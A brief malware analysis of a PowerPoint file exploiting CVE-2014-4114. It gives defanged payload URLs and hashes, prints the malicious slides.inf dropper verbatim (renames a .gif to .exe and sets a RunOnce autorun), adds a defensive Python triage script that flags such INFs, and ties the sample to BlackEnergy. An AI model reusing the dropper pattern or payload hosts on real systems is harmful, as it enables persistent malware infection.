- quick and dirty analysis of a PPTX exploiting CVE-2014-4114:
- sample of the file thanks to @artem_i_baranov pptx/pptsx.
- https://www.virustotal.com/en/file/70b8d220469c8071029795d32ea91829f683e3fbbaa8b978a31a0974daee8aaf/analysis/
- after opening the document, the following two files are downloaded:
- hxxp://94[.]185[.]85[.]122/public/slide1[.]gif MD5: 8a7c30a7a105bd62ee71214d268865e3
- https://www.virustotal.com/en/file/0fda6c118fb7dc946440cb9225e32ab1825d87d4f088bb75a6eab7cef35433bc/analysis/
- hxxp://94[.]185[.]85[.]122/public/slides[.]inf MD5: 8313034e9ab391df83f6a4f242ec5f8d
- content of slides.inf:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
; 61883.INF
; Copyright (c) Microsoft Corporation. All rights reserved.
[Version]
Signature = "$CHICAGO$"
Class=61883
ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}
Provider=%Msft%
DriverVer=06/21/2006,6.1.7600.16385
[DestinationDirs]
DefaultDestDir = 1
[DefaultInstall]
RenFiles = RxRename
AddReg = RxStart
[RxRename]
slide1.gif.exe, slide1.gif
[RxStart]
HKLM,Software\Microsoft\Windows\CurrentVersion\RunOnce,Install,,%1%\slide1.gif.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
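- what the INF does when it is executed (the Install verb processes its [DefaultInstall] section): RenFiles entries are "new-name, old-name", so slide1.gif is renamed to slide1.gif.exe inside DIRID 1 (DefaultDestDir = 1, the directory the INF was launched from), and the AddReg entry writes a RunOnce value pointing at %1%\slide1.gif.exe, i.e. the renamed file in that same directory, so it runs at the next logon. The [Version] header is copied from a legitimate Microsoft 61883.inf and is only decoration. Below is an added Python triage script, not part of the original paste, that reads the INF the same way: it follows the [DefaultInstall] directives to their sections, expands %Strings% and %DIRID% references and flags a rename to an executable extension and a write under an autorun key. The embedded INF text is the one shown above; the autorun key list and the DIRID table are assumptions trimmed to what this sample needs.

```python
"""Added example (not from the original paste): triage of an INF dropper.

Parses slides.inf the way the INF engine reads [DefaultInstall]: follow
the RenFiles/AddReg directives to their sections, expand %name% and %DIRID%
tokens, and flag a rename to an executable extension and a registry write
under an autorun key.
"""
import csv
import re

# slides.inf exactly as shown on the page (MD5 8313034e9ab391df83f6a4f242ec5f8d).
SLIDES_INF = r"""
; 61883.INF
; Copyright (c) Microsoft Corporation. All rights reserved.
[Version]
Signature = "$CHICAGO$"
Class=61883
ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}
Provider=%Msft%
DriverVer=06/21/2006,6.1.7600.16385
[DestinationDirs]
DefaultDestDir = 1
[DefaultInstall]
RenFiles = RxRename
AddReg = RxStart
[RxRename]
slide1.gif.exe, slide1.gif
[RxStart]
HKLM,Software\Microsoft\Windows\CurrentVersion\RunOnce,Install,,%1%\slide1.gif.exe
"""

# Assumption: short lists of autorun key prefixes and DIRIDs, enough for this
# sample; a production tool would carry the full tables.
AUTORUN_KEYS = (
    r"software\microsoft\windows\currentversion\run",  # prefix also matches RunOnce
    r"software\microsoft\windows nt\currentversion\winlogon",
)
EXEC_EXTS = (".exe", ".dll", ".scr", ".com", ".bat", ".cmd", ".vbs", ".js")
DIRIDS = {"1": "<SourceDir>", "10": "<Windows>", "11": "<System32>"}


def parse_inf(text):
    """Return {section: [line, ...]}; ';' comments and blank lines are dropped."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()  # good enough here: no quoted ';'
        if not line:
            continue
        m = re.match(r"^\[(.+)\]$", line)
        if m:
            current = m.group(1).strip().lower()  # section names are case-insensitive
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections


def fields(line):
    """Split an INF entry on commas, honouring double-quoted fields."""
    return [f.strip() for f in next(csv.reader([line], skipinitialspace=True))]


def strings_table(sections):
    """[Strings] section as {name: value} for %name% expansion."""
    table = {}
    for line in sections.get("strings", []):
        key, sep, val = line.partition("=")
        if sep:
            table[key.strip().lower()] = val.strip().strip('"')
    return table


def expand(value, strings):
    """Expand %name% from [Strings] and %DIRID% tokens; unknown tokens stay as-is."""
    def repl(m):
        key = m.group(1).lower()
        return strings.get(key) or DIRIDS.get(key) or m.group(0)
    return re.sub(r"%([^%]+)%", repl, value)


def referenced_sections(sections, directive, install="defaultinstall"):
    """Section names listed by e.g. 'AddReg = A, B' inside an install section."""
    names = []
    for line in sections.get(install, []):
        key, sep, val = line.partition("=")
        if sep and key.strip().lower() == directive:
            names += [n.strip().lower() for n in val.split(",") if n.strip()]
    return names


def triage(text):
    """List what [DefaultInstall] does, flagging rename-to-exe and autorun writes."""
    sections = parse_inf(text)
    strings = strings_table(sections)
    findings = []
    for sec in referenced_sections(sections, "renfiles"):
        for line in sections.get(sec, []):
            f = fields(line)
            if len(f) < 2:
                continue
            new, old = f[0], f[1]  # RenFiles entries are: new-name, old-name
            findings.append({
                "type": "rename", "old": old, "new": new,
                "suspicious": new.lower().endswith(EXEC_EXTS)
                and not old.lower().endswith(EXEC_EXTS),
            })
    for sec in referenced_sections(sections, "addreg"):
        for line in sections.get(sec, []):
            f = fields(line) + [""] * 5  # AddReg: root, subkey, name, flags, value
            root, subkey, name, _flags, value = f[:5]
            findings.append({
                "type": "registry",
                "key": expand(f"{root}\\{subkey}", strings),
                "name": name,
                "value": expand(value, strings),
                "suspicious": subkey.lower().startswith(AUTORUN_KEYS),
            })
    return findings


if __name__ == "__main__":
    for finding in triage(SLIDES_INF):
        print(("!! " if finding["suspicious"] else "   ") + str(finding))
```

Running it on the sample prints two flagged findings: the rename of slide1.gif to slide1.gif.exe and the RunOnce value Install = <SourceDir>\slide1.gif.exe. The same two checks (rename to an executable extension, AddReg under Run/RunOnce) are a reasonable static signature for INF droppers of this kind, independent of the file names used.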
- It seems that the author of this attack worked hard to develop it but then used a highly detected dropper, which seems to be related to BlackEnergy:
- http://www.eset.com/int/about/press/articles/article/eset-research-ukraine-and-poland-targeted-by-sophisticated-blackenergy-trojan/